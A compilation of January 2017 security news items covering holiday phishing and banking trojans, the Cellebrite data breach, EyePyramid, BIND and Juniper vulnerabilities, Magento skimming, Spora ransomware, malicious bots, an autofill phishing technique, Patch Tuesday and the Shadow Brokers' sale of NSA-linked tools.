Example of a Christmas-themed phishing scam resembling the Alibaba.com e-shop.

The example on the screen shot above doesn’t look Christmas-themed at first glance. However this fake Alibaba.com website was available on the christmascartoons.org URL and was supposed to attract victims with a tempting offer to get a loan with very low interest, along with the ability to search for goods and buy them from the same page using a credit card.

In another example targeting mobile users, criminals tried to exploit the popularity of the Clash of Clans mobile game.

Holiday 2016 financial cyberthreats overview - update

The scam promises that the developers of the game are giving away some valuable in-game virtual items for free, as a New Year present to fans.

Holiday 2016 financial cyberthreats overview - update

Users can choose from range of items, however in order to receive these gifts, they need to fill in a registration form which requests their Gmail account details.

Holiday 2016 financial cyberthreats overview - update

Needless to say, in exchange for this information, the victim receives nothing but a loss of control over their email account and the confirmation email.

Holiday 2016 financial cyberthreats overview - update

But the latter is only sent so criminals could be sure that the credentials provided by the victim are legitimate.

In general, we can’t say that the holiday period in 2016 has seen an unusually high increase of phishing attacks, however, our major hypothesis, stated in previous reports – that criminals would exploit Black Friday and Christmas topics and dates – has been confirmed.

And of course, financial phishing wasn’t the only type of cyberthreat that behaved unusually in the last three months of 2016. The financial malware landscape also showed some interesting changes.

Financial malware attacks

In total, during Q4 2016 Kaspersky Lab registered attacks with financial malware against 319,692 users worldwide. That is 22.49% more than during the same period in 2015, when 261,000 users were attacked, and 2.7% more than in 2014. It is hard to say if such an increase has been provoked by criminal interest in the holiday season; however, data on the dynamics of attacks shows that just like phishing scammers, financial malware operators tried to connect their activity to particular dates.

Holiday 2016 financial cyberthreats overview - update

Dynamics of attacks with financial malware during Q4 2016 (holiday period)

25th November 2016 (Black Friday) saw a modest, but visible spike in attacks, with another on 28th November (Cyber Monday). In all, November became the second hottest month of the period in terms of number of attacked users: with more than 120 000. The hottest was October, with more than 130 000 attacked users.

Holiday 2016 financial cyberthreats overview - update

Dynamics of attacks with financial malware during Black Friday and Cyber Monday 2016

The activity of attackers during the Christmas period showed a different pattern. A major increase happened before (on December 22nd) and after (from 25 – 27th December). This may be explained by the fact that most e-commerce activities happen around these dates: people buy gifts and goods for Christmas and the New Year, travel for vacations and spend money on entertainment.

Holiday 2016 financial cyberthreats overview - update

Dynamics of attacks with financial malware during the Christmas 2016 period

It is also important to note that the dynamics of attacks during the holidays are very similar to what we have already seen in 2015 and 2014. Criminals are eager to get users’ money and the holiday period is a key time for them.

To reach their goals they use one of 30 families of banking trojans of which five are the most widespread: Zbot, Nymaim, Shiotob, Gozi and Neurevt. These five are responsible for attacks against 92.35% of users in the period.

Holiday 2016 financial cyberthreats overview - update

The share of users attacked with Top 5 banking trojans


It looks like the trends we spotted as part of our analysis of the threat landscape during the holiday period in 2014 and 2015 have repeated in 2016, but on a larger scale, with more users being attacked. It is too early to draw conclusions on how successful fraud campaigns during the 2016 holiday season were, because usually criminals who were able to steal credentials to payment cards don’t cash them in immediately. They wait for several months in order to make fraudulent transactions less suspicious to the anti-fraud systems of financial organizations, but it would be safe to say that there were multiple attempts to exploit the high sales season.

Although the holiday season is over, it is still imperative to keep in mind several simple rules to stay safe when carrying out financial operations online. Steps to follow can be found in our initial report about holiday threats.

Phone-Hacking Firm Cellebrite Got Hacked; 900GB Of Data Stolen
13.1.2017 thehackernews Mobil
Cellebrite Got Hacked
The company that sells digital forensics and mobile hacking tools to others has itself been hacked.
Israeli firm Cellebrite, the popular company that provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had 900 GB of its data stolen by an unknown hacker.
But the hacker has not yet publicly released anything from the stolen data archive, which includes its customer information, user databases, and a massive amount of technical data regarding its hacking tools and products.
Instead, attackers are looking for possible opportunities to sell the access to Cellebrite system and data on a few selected IRC chat rooms, the hacker told Joseph Cox, contributor at Motherboard, who was contacted by the hacker and received a copy of the stolen data.
Meanwhile, Cellebrite also admitted that it recently experienced "unauthorized access to an external web server," and said that it is "conducting an investigation to determine the extent of the breach. The impacted server included a legacy database backup of my.Cellebrite, the company's end user license management system."
The 900 GB of stolen archive also includes login data (usernames and passwords) of Cellebrite customers, which suggests that it has been taken from the web servers related to Cellebrite's site.
The dump also contains "evidence files from seized mobile phones, and logs from Cellebrite devices," as well as it appears that company has sold phone hacking tools to repressive regimes, such as Turkey, the United Arab Emirates, and Russia.
On the other hand, the hacker did not clearly state the actual extent of what he/she had done to Cellebrite's systems.
"I can't say too much about what has been done," the hacker told Motherboard. "It's one thing to slap them, it's a very different thing to take pictures of [their] balls hanging out."
Cellebrite is known for its powerful hacking tool Universal Forensic Extraction Device (UFED) that help investigators bypass the security mechanisms of mobile phones, especially iPhones, and extract all data, including SMS messages, emails, call logs and passwords from them.
Just a few months back, Cellebrite's most sensitive in-house capabilities were made public by one of its products' resellers, who distributed copies of Cellebrite's firmware and software for anyone to download.

Two observations about the Italian EyePyramid espionage campaign
13.1.2017 securityaffairs
Let’s try to analyze some facts about the Italian EyePyramid espionage campaign. Prof. Corrado Aaron Visaggio helped us in this difficult task.
The Italian EyePyramid espionage campaign raised to me two simple questions:

(i) Are the criminals geniuses or dummies?

(ii) How can an old, known, easy-to-detect malware infect so many machines belonging to different perimeters for so long time, but only in Italy?

This cyber-espionage appears as a naive mixture of sophisticated and amateur techniques. The choice of the spyware (amateur) is the first strange thing: EyePyramid is an old and known malware.

Kaspersky reported that its products had blocked more than 90 EyePyramid infection attempts. While 80 percent of these attempts were spotted in Italy, the malware was also detected in France, Indonesia, Monaco, Mexico, China, Taiwan, Germany and Poland.

Kaspersky says the malware is not sophisticated and not difficult to detect. The company also pointed out that the attackers had poor operational security (OPSEC) as they failed to hide their real IP addresses when launching attacks, and they used regular phone calls and WhatsApp to discuss their activities.

“In general, the operation had very poor OPSEC (operational security); the suspects used IP addresses associated with their company in the attacks, discussed the victims using regular phone calls and through WhatsApp and, when caught, attempted to delete all the evidence.”

“This indicates they weren’t experts in the field but merely amateurs, who nevertheless succeeded in stealing considerably large amounts of data from their victims. As seen from other known cyberespionage operations, it’s not necessary for the attackers to use high profile malware, rootkits, or zero-days to run long-standing cyberespionage operations.” reads the analysis published by Kaspersky on EyePyramid.

The final victims were infected by emails sent by compromised accounts belonging to several attorneys and associates in several law firms (sophisticated) but data was exfiltrated as attached to emails sent to a small set of e-mail addresses (amateur).

The malware was a customized (sophisticated) version of a very old malware (about 1995) (Amateur), with a weak obfuscation (amateur), but that makes use of reflection (sophisticated).

The malware has been updated during all the duration of the espionage (likely 4-6 years) in order to make it evasive to detection and to add more advanced spying functions, like intercepting the keying of specific words (sophisticated), but the stolen data resided on a couple of servers regularly and directly accessed by the supposed authors of the espionage (amateur).

It is interesting to note that the purchase of the paid library has led the authorities to the identity of the persons behind the campaign (amateur), since the cyber criminals used a licensed library -MailBee.Net- that they regularly paid, to send the exfiltrated data out to dropzones.

Are these criminals geniuses or dummies?

The second observation regards some concerns about “how” a similar software can stay resident for years in so many machines that should be placed within several different perimeters, that are supposed to be protected and monitored.

Concern number 1: is it really so easy to infect the machines of key people of a Nation’s Government (and further equally important Institutions and Organizations), with a very old and unsophisticated malware?

Concern number 2: The malware remains active for several years and the attackers were able to update it in order to evade the detection: did the attackers know how the operating environment of the victims changed over time and so did they adapt properly the malware?

Concern number 3: C&C centers usually make use of fluxing techniques (for IP or domains) for masquerading themselves. In this case, the dropzones where a small number of domains or e-mail addresses. So exfiltrated data was sent continuously to a fixed and small number of dropzones. How could this activity (easy to classify as an anomaly) pass unnoticed to a monitoring system for a so long time?

Concern number 4: if the malware was easy to detect, as claimed by Kasperksy, why it remained undetected on so many machines, in different perimeters, for a so long time?



The ISC issued updates for 4 High severity DoS flaws in BIND
13.1.2017 securityaffairs
The Internet Systems Consortium (ISC) has issued security updates to address four high severity flaws in the DNS software BIND.
The Internet Systems Consortium (ISC) has issued updates to solve four high severity flaws in the DNS software BIND. The flaw could be exploited by a remote attacker to cause a DoS condition.

An attacker can exploit the vulnerabilities to cause the BIND name server process to encounter an assertion failure and stop executing. The Internet Systems Consortium confirmed that it is not aware of active exploits for the flaws.


Below the list of flaws provided by the ISC:

CVE-2016-9778: An error in handling certain queries can cause an assertion failure when a server is using the nxdomain-redirect feature to cover a zone for which it is also providing authoritative service. A vulnerable server could be intentionally stopped by an attacker if it was using a configuration that met the criteria for the vulnerability and if the attacker could cause it to accept a query that possessed the required attributes.
CVE-2016-9147: Depending on the type of query and the EDNS options in the query they receive, DNSSEC-enabled authoritative servers are expected to include RRSIG and other RRsets in their responses to recursive servers. DNSSEC-validating servers will also make specific queries for DS and other RRsets. Whether DNSSEC-validating or not, an error in processing malformed query responses that contain DNSSEC-related RRsets that are inconsistent with other RRsets in the same query response can trigger an assertion failure. Although the combination of properties which triggers the assertion should not occur in normal traffic, it is potentially possible for the assertion to be triggered deliberately by an attacker sending a specially-constructed answer.
CVE-2016-9131: A malformed query response received by a recursive server in response to a query of RTYPE ANY could trigger an assertion failure while named is attempting to add the RRs in the query response to the cache. While the combination of properties which triggers the assertion should not occur in normal traffic, it is potentially possible for the assertion to be triggered deliberately by an attacker sending a specially-constructed answer having the required properties, after having engineered a scenario whereby an ANY query is sent to the recursive server for the target QNAME. A recursive server will itself only send a query of type ANY if it receives a client query of type ANY for a QNAME for which it has no RRsets at all in cache, otherwise it will respond to the client with the the RRsets that it has available.
CVE-2016-9444: An unusually-formed answer containing a DS resource record could trigger an assertion failure. While the combination of properties which triggers the assertion should not occur in normal traffic, it is potentially possible for the assertion to be triggered deliberately by an attacker sending a specially-constructed answer having the required properties.
The CVE-2016-9778 flaw affects only a subset of servers which are performing NXDOMAIN redirection using the “nxdomain-redirect” function.

The CVE-2016-9131, the CVE-2016-9147, and the CVE-2016-9444 flaws occur during the processing of an answer packet received in response to a query.

“As a result, recursive servers are at the greatest risk; authoritative servers are at risk only to the extent that they perform a limited set of queries (for example, in order to do zone service” state the advisories for the flaws.

The BIND versions 9.9.9-P5, 9.10.4-P5, 9.11.0-P2 and 9.9.9-S7 address the above vulnerabilities.

Israeli mobile phone data extraction company Cellebrite was hacked
13.1.2017 securityaffairs Mobil
The Israeli mobile phone data extraction company Cellebrite was hacked by unknown hackers that provide the 900GB database to Motherboard.
An irony of fate, the Israeli mobile phone data extraction company Cellebrite was hacked. The company went in the headlines in the dispute between Apple and the FBI in the case of the San Bernardino shooter’s iPhone.

On Thursday, Vice Motherboard reported that an unnamed contacted it to provide the 900GB database belonging to Cellebrite. Basic contact information for users that were registered to receive notifications from the firm has been exposed along with hashed passwords and technical data regarding Cellebrite’s products.

The main product of the company is the Universal Forensic Extraction Device (UFED), an equipment that can rip data (i.e. SMS messages, emails, call logs) from a huge number of different models of mobile phones.

Cellebrite issued a statement to inform its customers of the data breach that affected an “external web server” containing the company’s license management system. An unauthorized third party broke into the company systems.

According to the firm the hackers accessed a legacy archive no more in use because the company has migrated to a new system.


The Israeli firm has advised all its customers to change their passwords.

“Cellebrite recently experienced unauthorized access to an external web server. The company is conducting an investigation to determine the extent of the breach. The impacted server included a legacy database backup of my.Cellebrite, the company’s end user license management system.” states the statement issued by the company.

Motherboard verified the email addresses in the archive by attempting to create accounts on the company portal.

“In the majority of cases, this was not possible because the email address was already in use. A customer included in the data confirmed some of their details.”

The hack revealed an uncomfortable truth, Cellebrite also works states with a questionable human rights records.

“In addition, the trove of materials contains “customer support tickets” showing that the Israeli company sells its services to countries with questionable human rights records, including Turkey, Russia, and the United Arab Emirates.” reported Ars.

Thousands of unpatched Magento shops hacked in the last two years
12.1.2017 securityaffairs Hacking

According to the BSI more than 6,000 online stores running eBay’s Magento platform have been hacked across the last two years.
According to the Germany’s Federal Office for Information Security, more than 6,000 online stores running eBay’s Magento platform have been hacked across the last two years. Crooks targeted the e-commerce platform in order to steal credit card data, they used to inject carding malware on unpatched Magento e-shops.

The Germany’s Federal Office for Information Security confirmed that roughly 1,000 online stores are in Germany, it did not provide info regarding the overall number of stolen data.

“The Federal Office for Information Security (BSI) has received information according to which currently at least 1,000 German online -Shops of online skimming affected. Here use Cyber -Kriminelle vulnerabilities in outdated versions of Shop software to inject malicious code. This then peaks the customer’s payment information during the ordering process and sends it to the perpetrators. Affected are online -Shops that on the widely used software based Magento.” reads the translation of the advisory issued by BSI. “The infected code and the associated data flow is usually not visible to users. The BSI is currently not aware of the extent of the payment data already passed through these attacks.”

The Federal Office reported the attacks to the victim, but many of them failed in fixing the issue. The security expert Willem de Groot first reported carding attacks against unpatched Magento shops in October. The Dutch expert analyzed a cyber attack against the website belonging to the National Republican Senatorial Committee allowed people to make donations. According to de Groot, who analyzed the traffic on the platform, hackers roughly accessed data related to 3,500 transactions per month between March 16 and October 5, 2016.

Card data was sent back to Russian IP addresses, the expert suspected that some 21,000 credit cards were stolen at the time.

de Groot believes that the attacks against Magento shops at the time that had compromised some 6,000 sites spanning 18 months.The experts also published a free vulnerability scanning service that could be used by operators of Magento shops to check their websites.

It is not clear if there are the same threat actors behind the attacks against the unpatched Magento shops

The German Federal office now tried again to warn operators of Magento shops that were compromised by hackers. Unfortunately, once again operators failed to complain necessary security measure to protect the e-commerce platform.

“Unfortunately, there are still indicators that many operators have been negligent in securing their online stores,” said the BSI president Arne Schönbohm.

“A variety of shops are running outdated software versions which contain several known vulnerabilities. Operators must fulfill their customer responsibilities and ensure their services are fixed quickly and consistently.”

“The BSI has at this point out that the obligation to secure systems not only for companies but also for all other businesslike operators of websites apply. This includes, for example, websites from private individuals or associations, if their operation is to generate revenues permanently. This is already assumed when banners placed on websites are placed in the form of banners.” states the BSI. “Customers and operators of online -Shops based on Magento can use the free service MageReportcheck whether your shop system has known vulnerabilities and is affected by the current attacks.”

Spora Ransomware allows victims to pay for immunity from future attacks
12.1.2017 securityaffairs

Security experts from Emsisoft spotted a new strain of malware, the Spora ransomware, that allows potential victims to pay for immunity from future attacks.
Security experts from Emsisoft spotted a new strain of ransomware dubbed Spora that implements a singular extortion mechanism, it allows potential victims to pay for immunity from future attacks.
According to the experts, the Spora ransomware appears well-written, it has a professional website for payment and offers several options to the victims that can pay to recover files, to remove the malware, and to gain immunity from future attacks.

Spora ransomware

The Spora ransomware implements a unique pricing model to determine how much a victim has to pay.

The attack vector is the email, victims receive messages with fake invoices as attachments. The attachments are ZIP archives with an HTA (HTML Application) file inside, masquerading as a PDF or DOC. When victims run the file, it extracts a JScript file in the %TEMP% folder, writes an encoded script into it, and then executes the file.

The malware encrypts file stored on both local files and network shares and doesn’t append an extension to them. The Spora ransomware doesn’t encrypt files located in specific directories to avoid compromise the machine operation.

According to Emsisoft, the ransomware leverages Windows CryptoAPI for encryption, it uses both RSA and AES to encrypt the files.

The encryption key management is quite complex as explained in the post published by the security firm.

“When Spora arrives on a system, it will first find and decrypt the malware author’s public RSA key embedded inside the malware executable using a hard-coded AES key. Once the malware author’s public RSA key has been successfully imported, the malware continues by creating a new 1024 bit RSA key pair, which we will call the victim’s RSA key pair, consisting of both a private and public key. It will also generate a new 256 bit AES key to encrypt the victim’s private RSA key with. Once the victim’s private RSA key is encrypted, the AES key used is then encrypted using the malware author’s public RSA key. The encrypted key material together with some additional information is then saved inside the .KEY file.” states the analysis published by Emsisoft.

“To encrypt a document or file on the system, Spora will first generate a new 256 bit per-file AES key. This per-file key serves to encrypt up to the first 5 MB of the file. Once done, the malware will encrypt the per-file key using the victim’s public RSA key and the RSA-encrypted per-file key is appended to the encrypted file.”

One of the most interesting abilities of the malware is that it is able to encrypt files without a command and control (C&C) server connection. Even if a security firm is able to analyze a decryption tool developed for one victim, they will not able to decrypt files of other users.

Experts believe the Spora ransomware is sold as a ransomware-as-a-service because instance of malware they analyzed have an hardcoded identify that is likely used to identify a specific campaign.

The aforementioned .KEY file contains multiple information such as the infection date, the username of the victim, and the locale of the infected system. These information are used by the author of the Spora ransomware to determine the ransom amount.

in 2016, these are the four ways how bots altered history
12.1.2017 securityaffairs

2016 was the biggest year by far for all sorts of bots. From Chatbots to bad bots, the past year was eventful to say the least.
With more than 980+ cyber security breaches across all online businesses and 35 million accounts exposed. Yahoo! In a 2016 report, disclosed that more than 1 billion accounts have been stolen. $400 billion was reportedly lost to cyber attacks across all industries this year. With this trend, the losses are set to top out at around $2.1 Trillion by 2019.

Now, let’s look at the top 4 incidences of bots that altered history in 2016.

Mirai bots

Dyn Cyberattack (Mirai) – The 2016 Dyn cyberattack took place on October 21st 2016. The attack was carried out by a malware known as Mirai. Mirai ( Japanese word for “The Future”) is a malicious software that turned Internet of Things (IoT) into bots, which was later used in the record breaking exploit. Since 2010, the number of devices connected to the internet has doubled from 12.5 billion devices to 25 billion. Mirai malware worked on the principle of identifying vulnerable IoT devices with default username and password, and planting the malware into them. Once the devices turned bad, bots in tandem were able to produce over 1.2 terabytes/sec attacks. Major websites such as Amazon.com, Netflix, CNN, BBC etc were taken down by the bad bots. This is by far the biggest attack on the free internet. This is a case in point to understand what it meant for services routed via DNS during the Dyn cyberattack.
Bots used for influencing public: Social media bots were the most active in 2016. With major events such as Brexit and US elections, social media bots were the most influential.
Brexit: Automated social media accounts produced by both sides of the debate created these bots to have a massive influence on the referendum vote; especially on those last-minute ‘undecideds’ Researchers from Oxford University have found that bots played a strategic role during the debate. The social media bots helped to circulate ‘repetitive’ political content to manipulate the thinking of the general public. Social media bots had a very simple role to play during Brexit, they had to tweet pro or anti Brexit tweets over and over again or just retweet /share messages of influencers on either side. This helped them float the message they wanted for a much longer time, on the social media platforms than required.

US elections: As per Twitter Audit, Donald Trump’s twitter account had almost 40% inactive, fake and spam followers, while Hillary Clinton had around 37%. The number roughly adds up to more than 7 million fake/inactive bot accounts that were circulating messages across the globe. These bot accounts helped in propagating messages for both the candidates involved and heavily influenced the undecided voter.

Under the scanner, Impact of Twitter, Facebook, and other social media might be not be considered a serious threat. But the bots spreading propaganda are usually encountered by journalists who use social media. Journalists, in-turn, interpret these bot propagated messages as a trend among people and report it. This increases the influence of such bad social media bots even more. It is crazy how bots can influence and change the course of history for 2 major nations last year, and it’s just the beginning. German Chancellor Angela Merkel’s apprehensions on bots manipulating the upcoming German elections are not unfounded.

The Rise of Chatbots: 2016 is considered to be the rise of chatbots. With every major e-commerce, service provider producing a chatbot. Early 2016 started a race among companies to create chatbots. Chatbots are highly regarded as the new automated intelligence trend. These bots are created to interact with the user to provide information or to execute simple tasks.
Good chatbots went bad: When Microsoft launched Tay (AI Twitter chat bot) on March 23, 2016, it was the start of a new era. Tay was programmed to learn from its interactions with real users on twitter. Tay, however, ended up becoming a vulgar, racist bot within a few hours. The bot, however, was taken down by Microsoft within 16 hours. By and by, Tay tweeted 96,000 times before it went offline.

BOTS Act passed in the US senate (Ticket Scalping bots) : Ticket scalping bots were made illegal in the US during December 2016. President Obama had signed the BOTS (Better Online Ticket Sales) Act of 2016. The significance of this bill is that any software or automated bot program used to scalp tickets is now completely ILLEGAL. Finally, ticket scalping is a federal offense. Ticket scalping this year was brought to light by Lin-Manuel Miranda, who was the star of the Broadway show Hamilton. Hamilton tickets were scalped using bots online and were reselling for a higher price on another website. With the help of the senators and mainstream media, congress was able to pass the bill. Ticket scalping bots are notorious for buying out thousands of tickets within a matter of seconds. This frustrates genuine users that visit the site, in the long run hurts the producers as well.
According to a famous online ticket selling website, TicketMaster. In 2016, bots tried to buy 5 billion tickets, or 10,000 a minute, on their website. This resulted in 60% of the tickets getting scalped by bots.

With the surge in malicious bots, there is a need to stop them before they could harm your online businesses. Bots have been increasingly malicious and damaging for all online businesses.

So, have you thought about how your online business may be silently targeted by bad bots? How is your 2017 IT roadmap poised to address bot threats?

Browser AutoFill Feature Can Leak Your Personal Information to Hackers
11.1.2017 thehackernews Hacking
Hackers Can Steal Your Personal Information, Thanks to Browser AutoFill Feature
Just like most of you, I too really hate filling out web forms, especially on mobile devices.
To help make this whole process faster, Google Chrome and other major browsers offer "Autofill" feature that automatically fills out web form based on data you have previously entered in similar fields.
However, it turns out that an attacker can use this autofill feature against you and trick you into spilling your private information to hackers or malicious third parties.
Finnish web developer and whitehat hacker Viljami Kuosmanen published a demo on GitHub that shows how an attacker could take advantage of the autofill feature provided by most browsers, plugins, and tools such as Password Managers.
The proof-of-concept demo website consists of a simple online web form with just two fields: Name and Email. But what's not visible are many hidden (out of sight) fields, including the phone number, organization, address, postal code, city, and country.
Giving away all your Personal Information Unknowingly

So, if users with an autofill profile configured in their browsers fill out this simple form and click on submit button, they'll send all the fields unaware of the fact that the six fields that are hidden to them but present on the page also get filled out and sent to unscrupulous phishers.
You can also test your browser and extension autofill feature using Kuosmanen's PoC site.
Kuosmanen can make this attack even worse by adding more personal fields out of user's sight, including the user's address, credit card number, expiration date, and CVV, although auto-filling financial data forms will trigger warnings on Chrome when sites do not offer HTTPS.
Kuosmanen attack works against a variety of major browsers and autofill tools, including Google Chrome, Apple Safari, Opera, and even the popular cloud security vault LastPass.

Mozilla's Firefox users do not need to worry about this particular attack as the browser currently, does not have a multi-box autofill system and forces users to select pre-fill data for each box manually.
Therefore, the Firefox browser can't be tricked into filling text boxes by programmatic means, Mozilla principal security engineer Daniel Veditz says.
Here's How to Turn Autofill Feature Off
The simplest way to protect yourself against such phishing attacks is to disable form autofill feature in your browser, password manager or extension settings.
Autofill feature is turned on by default. Here's how to turn this feature off in Chrome:
Go to Settings → Show Advanced Settings at the bottom, and under the Passwords and Forms section uncheck Enable Autofill box to fill out web forms with a single click.
In Opera, go to Settings → Autofill and turn it off.
In Safari, go to Preferences and click on AutoFill to turn it off.

Microsoft Releases 4 Security Updates — Smallest Patch Tuesday Ever!
11.1.2017 thehackernews

Microsoft has issued its first Patch Tuesday for 2017, and it's one of the smallest ever monthly patch releases for the company, with only four security updates to address vulnerabilities in its Windows operating system as well as Adobe Flash Player.
Meanwhile, Adobe has also released patches for more than three dozen security vulnerabilities in its Flash Player and Acrobat/Reader for Windows, MacOS, and Linux desktops.
According to the Microsoft Advisory, only one security bulletin is rated critical, while other three are important. The bulletins address security vulnerabilities in Microsoft's Windows, Windows Server, Office, Edge and Flash Player.
The only security bulletin rated as critical is the one dedicated to Adobe Flash Player, for which Microsoft distributed security patches through Windows Update. Other security bulletins that addresses flaws in Microsoft products are as follows:
Bulletin 1 — MS17-001
This security update resolves just one vulnerability in the Microsoft Edge browser. Microsoft rates this bulletin as important.
The vulnerability (CVE-2017-0002) could let an attacker gain elevated access privileges by tricking users to view a specially crafted web page using Microsoft Edge.
This elevation of privilege flaw exists in Microsoft Edge's cross-domain policies, which could allow "an attacker to access information from one domain and inject it into another domain," Microsoft says.
The update will be rolled out to Windows 10 and Server 2016.
Bulletin 2 — MS17-002
This security bulletin is the one that also patches a single vulnerability in Microsoft Office.
The vulnerability, designated CVE-2017-0003, is a memory corruption issue that allows an attacker to perform remote code execution (RCE) in Microsoft Office 2016 and SharePoint Enterprise Server 2016.
The flaw lets a specially crafted Word file to take control of the target machine with the current user's access privileges.
Users who are logged in with fewer user rights on the system are less impacted than users who operate with administrative user rights, such as some home accounts and server users.
Bulletin 3 — MS17-003
This security bulletin is rated as Critical and resolves 12 security vulnerabilities in Adobe Flash Player for all supported editions of Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10, and Windows Server 2016.
The security patch will be automatically rolled out to Windows users running Microsoft Edge or Internet Explorer 11.
Bulletin 4 — MS17-004
This security update, also rated as important, addresses just one denial of service (DoS) vulnerability in Local Security Authority Subsystem Service (LSASS) for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
The flaw (CVE-2017-0004) resides in the LSASS that handles authentication requests, which could be exploited to reboot the system by sending a specially crafted authentication request to the targeted system or server.
Adobe Security Patch Update
A total of 13 vulnerabilities has been addressed in the Flash Player, while none of the flaws have actively been exploited in the wild.
The Flash Player updates for both Windows and macOS systems have been rated critical, as successful exploitation of the vulnerability could let an attacker perform remote code execution on the target system. However, Linux users are at lower risk for attack.
The update for Adobe Acrobat and Reader addresses some 29 flaws, including some remote code execution (RCE) vulnerabilities in both Windows and macOS.
Users and IT administrators are strongly recommended to apply Windows and Adobe patches as soon as possible in order to keep away hackers and cybercriminals from taking control over your computer.
A system reboot is necessary for installing updates, so users are advised to save work on PCs where the whole package of patches is deployed before initiating the process.

Juniper SRX firewalls open a root-level account due to a flaw
11.1.2017 securityaffairs

Experts at Juniper have discovered that an update for its Juniper SRX firewalls opens a root-level account on the network device.
The company started warning its users, every user who issued the “request system software” command with the “partition” option is affected by the issue. The failure of the system update leaves it in a state where root CLI login is allowed without a password. The problem affects any system upgraded from Junos OS prior to 12.1X46-D65. When the system upgrade fails, the system goes into a “safe mode” designed to allow a sysadmin to access it and solve the problem.

This implies that a root login without a password is available.

“Using the ‘
request system software
‘ command with the ‘
‘ option on an SRX Series device upgrading from Junos OS releases prior to 12.1X46-D65 can leave the system in a state where root CLI login is allowed without a password due to the system reverting to a “safe mode” authentication triggered by the failed upgrade. Additionally, valid authentication credentials fail to work due to the same issue. Only root with no password will work.” reads a security advisory published by Juniper.

According to the security advisory published by Juniper, no other platform or version of Junos OS is affected by the vulnerability. It also confirmed that no other Juniper Networks products or platforms are affected.

The experts highlighted that any other previously-valid authentication credential is wiped from the system.

In order to definitively solve the problem, it is possible to upgrade the Juniper SRX Series device from an affected release to a fixed release.

Juniper SIRT confirmed that it is not aware of any malicious exploitation of this vulnerability.

“Avoid using the ‘
‘ option when upgrading an SRX Series device to Junos OS 12.1X46 prior to 12.1X46-D65.” continues the advisory. “Note that the symptoms are immediately obvious after an affected upgrade and may be remediated by rebooting the device post-upgrade.”

This means that just rebooting the system the problem will be solved.

The issue is tracked as CVE-2016-1278.

Stolen NSA "Windows Hacking Tools" Now Up For Sale!
11.1.2017 thehackernews BigBrothers
The Shadow Brokers who previously stole and leaked a portion of the NSA hacking tools and exploits is back with a Bang!
The hacking group is now selling another package of hacking tools, “Equation Group Windows Warez,” which includes Windows exploits and antivirus bypass tools, stolen from the NSA-linked hacking unit, The Equation Group.
For those unfamiliar with the topic, The Shadow Brokers is a notorious group of black-hat hackers who, in August 2016, leaked exploits, security vulnerabilities, and "powerful espionage tools" created by The Equation Group.

On Saturday, the Shadow Brokers posted a message on their ZeroNet based website, announcing the sale of the entire "Windows Warez" collection for 750 Bitcoin (around US$678,630).
The data dump contains many windows hacking tools, categorized as following:
Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
Interestingly, the Remote Administration Tool (RAT) "DanderSpritz" included in the list is the one previously leaked in the NSA's documents revealed by Edward Snowden.

Besides this, malware researcher Jacob Williams analyzed the archive of "screenshots and output of the find command across the dump" provided by the hacker as an evidence of legitimacy and estimated that the tools may also include a Fully Undetectable Malware (FUD) toolkit.

The FUD toolkit might have an ability to "evade/bypass personal security products," such as Avira, Avast, Dr.Web, ESET Antivirus, Comodo, McAfee Antivirus, Microsoft Essential, Panda, Symantec, Trend Micro and Kaspersky Antivirus.
The buyers can purchase the entire database of hacking tools that The Equation Group used against various countries to expand its espionage operations.
In August, the Shadow Brokers announced an auction attempting to sell the complete set of tools to the highest bidder, but the group canceled their auction in October due to little or no response on their public sale.
But since this time the group has made Windows hacking tools up for sale, the chances are that hackers and espionage groups would be interested in buying these hacking tools.

ShadowBrokers offers for sale the stolen NSA Windows Hacking Tools
11.1.2017 securityaffairs BigBrothers
The ShadowBrokers is the hacker crew stolen the arsenal of the NSA-Linked Equation Group is offering for sale the stolen NSA Windows Hacking Tools.
The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a precious archive containing hacking tools and exploits.

At the end of October, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .

The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The security researchers Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

Earlier December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

We met Shadow Brokers last time in December 2016, when they changed the model of sale offering the NSA’s hacking arsenal for direct sale on an underground website.

The hacking group is back and now it is selling another package of hacking tools, “Equation Group Windows Warez.” The new archive includes a collection of Windows exploits and tools to evade detection of antivirus solutions.

The first malware, the Remote Administration Tool (RAT) “DanderSpritz,” was included in the collection of documents leaked by Edward Snowden.

The group posted a message on their website on the ZeroNet, announcing the sale of the entire “Windows Warez” archive for 750 Bitcoin (around US$678,630).

The data dump offered for sale contains several hacking tools grouped in the following categories:

Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
The malware researcher Jacob Williams published an analysis of the archive of “screenshots and output of the find command across the dump” provided by the ShadowBrokers.Williams started searching for info on the term “Psp_Avoidance” reported in one of the screenshots published by the group.

Making some Google Queries with the term “psp computer network operations” the researcher get back as the fifth result a page from ManTech. The page details the ACTP CNO Programmer Course and the course documentation indicates that PSP is an acronym for “Personal Security Product.”

